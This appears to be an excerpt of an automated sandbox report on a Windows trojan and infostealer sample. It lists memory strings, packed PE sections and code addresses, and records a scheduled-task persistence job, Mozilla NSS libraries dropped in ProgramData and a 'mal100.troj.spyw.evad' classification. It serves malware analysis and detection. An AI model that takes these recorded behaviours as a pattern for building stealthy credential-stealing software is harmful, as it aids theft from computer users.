                        Source: mozglue[1].dll.15.dr, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.15.dr, freebl3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.drString found in binary or memory: https://www.digicert.com/CPS0
                        Source: 586ef238b2.exe, 0000000F.00000002.3332366463.0000000001799000.00000004.00000020.00020000.00000000.sdmp, GCGHCBKF.15.dr, BAFCGIJD.4.drString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3332366463.0000000001893000.00000004.00000020.00020000.00000000.sdmp, CAAKKFHCFIECAAAKEGCF.15.dr, ECBGCGCGIEGCBFHIIEBF.4.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                        Source: 37664d9843.exe, 00000004.00000003.1847118263.0000000001F96000.00000004.00000020.00020000.00000000.sdmp, GCGHCBKF.15.dr, BAFCGIJD.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: EBGIDGCAFCBKECAAKJJKJEHDGC.15.drString found in binary or memory: https://www.mozilla.org
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000D28000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.00000000002A6000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: https://www.mozilla.org/about/
                        Source: EBGIDGCAFCBKECAAKJJKJEHDGC.15.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000D28000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.00000000002A6000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: https://www.mozilla.org/about/t.exe
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000D28000.00000040.00000001.01000000.00000009.sdmp, 37664d9843.exe, 00000004.00000002.1957654994.0000000000E2A000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.00000000002A6000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000E2A000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.mozilla.org/contribute/H
                        Source: 586ef238b2.exe, 0000000F.00000002.3328030922.00000000002A6000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: https://www.mozilla.org/contribute/eBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VS
                        Source: EBGIDGCAFCBKECAAKJJKJEHDGC.15.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000E2A000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.mozilla.org/contribute/npvZC5maWxlsvchost.exe
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000E2A000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.mozilla.org/contribute/tuvcuoGBK.exe
                        Source: 586ef238b2.exe, 0000000F.00000002.3328030922.00000000002A6000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000D28000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                        Source: 37664d9843.exe, 00000004.00000003.1911607631.0000000029BB0000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000003.3299424191.0000000028EAD000.00000004.00000020.00020000.00000000.sdmp, EBGIDGCAFCBKECAAKJJKJEHDGC.15.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                        Source: EBGIDGCAFCBKECAAKJJKJEHDGC.15.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000D28000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000034A000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                        Source: 37664d9843.exe, 00000004.00000003.1911607631.0000000029BB0000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000003.3299424191.0000000028EAD000.00000004.00000020.00020000.00000000.sdmp, EBGIDGCAFCBKECAAKJJKJEHDGC.15.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000D28000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000034A000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

                        System Summary

                        barindex
                        Source: So7a8eQerR.exeStatic PE information: section name:
                        Source: So7a8eQerR.exeStatic PE information: section name: .idata
                        Source: So7a8eQerR.exeStatic PE information: section name:
                        Source: explorti.exe.0.drStatic PE information: section name:
                        Source: explorti.exe.0.drStatic PE information: section name: .idata
                        Source: explorti.exe.0.drStatic PE information: section name:
                        Source: amadka[1].exe.4.drStatic PE information: section name:
                        Source: amadka[1].exe.4.drStatic PE information: section name: .idata
                        Source: amadka[1].exe.4.drStatic PE information: section name:
                        Source: GIEHIDHJDB.exe.4.drStatic PE information: section name:
                        Source: GIEHIDHJDB.exe.4.drStatic PE information: section name: .idata
                        Source: GIEHIDHJDB.exe.4.drStatic PE information: section name:
                        Source: CBFIIEHJDB.exe.15.drStatic PE information: section name:
                        Source: CBFIIEHJDB.exe.15.drStatic PE information: section name: .idata
                        Source: CBFIIEHJDB.exe.15.drStatic PE information: section name:
                        Source: random[1].exe.3.drStatic PE information: section name:
                        Source: random[1].exe.3.drStatic PE information: section name:
                        Source: random[1].exe.3.drStatic PE information: section name:
                        Source: random[1].exe.3.drStatic PE information: section name:
                        Source: random[1].exe.3.drStatic PE information: section name:
                        Source: 37664d9843.exe.3.drStatic PE information: section name:
                        Source: 37664d9843.exe.3.drStatic PE information: section name:
                        Source: 37664d9843.exe.3.drStatic PE information: section name:
                        Source: 37664d9843.exe.3.drStatic PE information: section name:
                        Source: 37664d9843.exe.3.drStatic PE information: section name:
                        Source: 586ef238b2.exe.3.drStatic PE information: section name:
                        Source: 586ef238b2.exe.3.drStatic PE information: section name:
                        Source: 586ef238b2.exe.3.drStatic PE information: section name:
                        Source: 586ef238b2.exe.3.drStatic PE information: section name:
                        Source: 586ef238b2.exe.3.drStatic PE information: section name:
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess Stats: CPU usage > 49%
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C07ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,4_2_6C07ED10
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0BB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,4_2_6C0BB700
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0BB8C0 rand_s,NtQueryVirtualMemory,4_2_6C0BB8C0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0BB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,4_2_6C0BB910
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C05F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,4_2_6C05F280
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeFile created: C:\Windows\Tasks\explorti.jobJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 3_2_005CE4103_2_005CE410
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 3_2_006030483_2_00603048
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 3_2_005C4CD03_2_005C4CD0
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 3_2_005F7D633_2_005F7D63
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 3_2_0060763B3_2_0060763B
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 3_2_00606EE93_2_00606EE9
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 3_2_005C4AD03_2_005C4AD0
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 3_2_0060775B3_2_0060775B
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 3_2_006087003_2_00608700
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 3_2_00602BB03_2_00602BB0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0535A04_2_6C0535A0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0CAC004_2_6C0CAC00
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C095C104_2_6C095C10
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0A2C104_2_6C0A2C10
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0C542B4_2_6C0C542B
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0654404_2_6C065440
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0C545C4_2_6C0C545C
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C066C804_2_6C066C80
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0B34A04_2_6C0B34A0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0BC4A04_2_6C0BC4A0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0664C04_2_6C0664C0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C07D4D04_2_6C07D4D0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C05D4E04_2_6C05D4E0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C096CF04_2_6C096CF0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C06FD004_2_6C06FD00
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C07ED104_2_6C07ED10
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0805124_2_6C080512
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C090DD04_2_6C090DD0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0B85F04_2_6C0B85F0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0A56004_2_6C0A5600
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C097E104_2_6C097E10
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0B9E304_2_6C0B9E30
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0A2E4E4_2_6C0A2E4E
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0746404_2_6C074640
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C079E504_2_6C079E50
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C093E504_2_6C093E50
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0C6E634_2_6C0C6E63
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C05C6704_2_6C05C670
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0BE6804_2_6C0BE680
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C075E904_2_6C075E90
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0B4EA04_2_6C0B4EA0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0C76E34_2_6C0C76E3
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C05BEF04_2_6C05BEF0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C06FEF04_2_6C06FEF0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C069F004_2_6C069F00
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0977104_2_6C097710
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0A77A04_2_6C0A77A0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C05DFE04_2_6C05DFE0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C086FF04_2_6C086FF0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0678104_2_6C067810
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C09B8204_2_6C09B820
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0A48204_2_6C0A4820
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0788504_2_6C078850
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C07D8504_2_6C07D850
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C09F0704_2_6C09F070
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0860A04_2_6C0860A0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0C50C74_2_6C0C50C7
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C07C0E04_2_6C07C0E0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0958E04_2_6C0958E0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C07A9404_2_6C07A940
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C06D9604_2_6C06D960
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0AB9704_2_6C0AB970
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0CB1704_2_6C0CB170
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0951904_2_6C095190
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0B29904_2_6C0B2990
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C05C9A04_2_6C05C9A0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C08D9B04_2_6C08D9B0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C099A604_2_6C099A60
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0CBA904_2_6C0CBA90
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0522A04_2_6C0522A0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C084AA04_2_6C084AA0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C06CAB04_2_6C06CAB0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0C2AB04_2_6C0C2AB0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C098AC04_2_6C098AC0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C071AF04_2_6C071AF0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C09E2F04_2_6C09E2F0
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C09D3204_2_6C09D320
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0553404_2_6C055340
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C06C3704_2_6C06C370
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C05F3804_2_6C05F380
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0C53C84_2_6C0C53C8
                        Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                        Source: Joe Sandbox ViewDropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: String function: 6C08CBE8 appears 134 times
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: String function: 6C0994D0 appears 90 times
                        Source: So7a8eQerR.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: So7a8eQerR.exeStatic PE information: Section: ZLIB complexity 0.9984097506830601
                        Source: So7a8eQerR.exeStatic PE information: Section: ohmzqnep ZLIB complexity 0.9941242376864512
                        Source: explorti.exe.0.drStatic PE information: Section: ZLIB complexity 0.9984097506830601
                        Source: explorti.exe.0.drStatic PE information: Section: ohmzqnep ZLIB complexity 0.9941242376864512
                        Source: random[1].exe.3.drStatic PE information: Section: ZLIB complexity 0.9996427210365854
                        Source: random[1].exe.3.drStatic PE information: Section: ZLIB complexity 0.99188232421875
                        Source: random[1].exe.3.drStatic PE information: Section: ZLIB complexity 0.9896240234375
                        Source: 37664d9843.exe.3.drStatic PE information: Section: ZLIB complexity 0.9996427210365854
                        Source: 37664d9843.exe.3.drStatic PE information: Section: ZLIB complexity 0.99188232421875
                        Source: 37664d9843.exe.3.drStatic PE information: Section: ZLIB complexity 0.9896240234375
                        Source: 586ef238b2.exe.3.drStatic PE information: Section: ZLIB complexity 0.9996427210365854
                        Source: 586ef238b2.exe.3.drStatic PE information: Section: ZLIB complexity 0.99188232421875
                        Source: 586ef238b2.exe.3.drStatic PE information: Section: ZLIB complexity 0.9896240234375
                        Source: amadka[1].exe.4.drStatic PE information: Section: ZLIB complexity 0.9984097506830601
                        Source: amadka[1].exe.4.drStatic PE information: Section: ohmzqnep ZLIB complexity 0.9941242376864512
                        Source: GIEHIDHJDB.exe.4.drStatic PE information: Section: ZLIB complexity 0.9984097506830601
                        Source: GIEHIDHJDB.exe.4.drStatic PE information: Section: ohmzqnep ZLIB complexity 0.9941242376864512
                        Source: CBFIIEHJDB.exe.15.drStatic PE information: Section: ZLIB complexity 0.9984097506830601
                        Source: CBFIIEHJDB.exe.15.drStatic PE information: Section: ohmzqnep ZLIB complexity 0.9941242376864512
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@29/45@0/3
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0B7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,4_2_6C0B7030
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7248:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7444:120:WilError_03
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeFile created: C:\Users\user\AppData\Local\Temp\ad40971b6bJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: softokn3[1].dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                        Source: 37664d9843.exe, 00000004.00000002.1976588662.000000001D8E0000.00000004.00000020.00020000.00000000.sdmp, 37664d9843.exe, 00000004.00000002.1984169473.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 37664d9843.exe, 00000004.00000002.1984622236.000000006C28F000.00000002.00000001.01000000.0000000A.sdmp, 586ef238b2.exe, 0000000F.00000002.3360313629.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3350248337.000000001CE06000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3360962751.000000006C28F000.00000002.00000001.01000000.0000000A.sdmp, nss3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: softokn3[1].dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                        Source: 37664d9843.exe, 00000004.00000002.1976588662.000000001D8E0000.00000004.00000020.00020000.00000000.sdmp, 37664d9843.exe, 00000004.00000002.1984169473.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 37664d9843.exe, 00000004.00000002.1984622236.000000006C28F000.00000002.00000001.01000000.0000000A.sdmp, 586ef238b2.exe, 0000000F.00000002.3360313629.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3350248337.000000001CE06000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3360962751.000000006C28F000.00000002.00000001.01000000.0000000A.sdmp, nss3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: 37664d9843.exe, 00000004.00000002.1976588662.000000001D8E0000.00000004.00000020.00020000.00000000.sdmp, 37664d9843.exe, 00000004.00000002.1984169473.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 37664d9843.exe, 00000004.00000002.1984622236.000000006C28F000.00000002.00000001.01000000.0000000A.sdmp, 586ef238b2.exe, 0000000F.00000002.3360313629.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3350248337.000000001CE06000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3360962751.000000006C28F000.00000002.00000001.01000000.0000000A.sdmp, nss3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: 37664d9843.exe, 00000004.00000002.1976588662.000000001D8E0000.00000004.00000020.00020000.00000000.sdmp, 37664d9843.exe, 00000004.00000002.1984169473.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 37664d9843.exe, 00000004.00000002.1984622236.000000006C28F000.00000002.00000001.01000000.0000000A.sdmp, 586ef238b2.exe, 0000000F.00000002.3360313629.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3350248337.000000001CE06000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3360962751.000000006C28F000.00000002.00000001.01000000.0000000A.sdmp, nss3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: softokn3[1].dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                        Source: softokn3[1].dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                        Source: softokn3[1].dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                        Source: softokn3[1].dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                        Source: softokn3[1].dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                        Source: 37664d9843.exe, 00000004.00000002.1976588662.000000001D8E0000.00000004.00000020.00020000.00000000.sdmp, 37664d9843.exe, 00000004.00000002.1984169473.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 37664d9843.exe, 00000004.00000002.1984622236.000000006C28F000.00000002.00000001.01000000.0000000A.sdmp, 586ef238b2.exe, 0000000F.00000002.3360313629.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3350248337.000000001CE06000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3360962751.000000006C28F000.00000002.00000001.01000000.0000000A.sdmp, nss3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: 37664d9843.exe, 00000004.00000002.1976588662.000000001D8E0000.00000004.00000020.00020000.00000000.sdmp, 37664d9843.exe, 00000004.00000002.1984169473.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3360313629.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3350248337.000000001CE06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
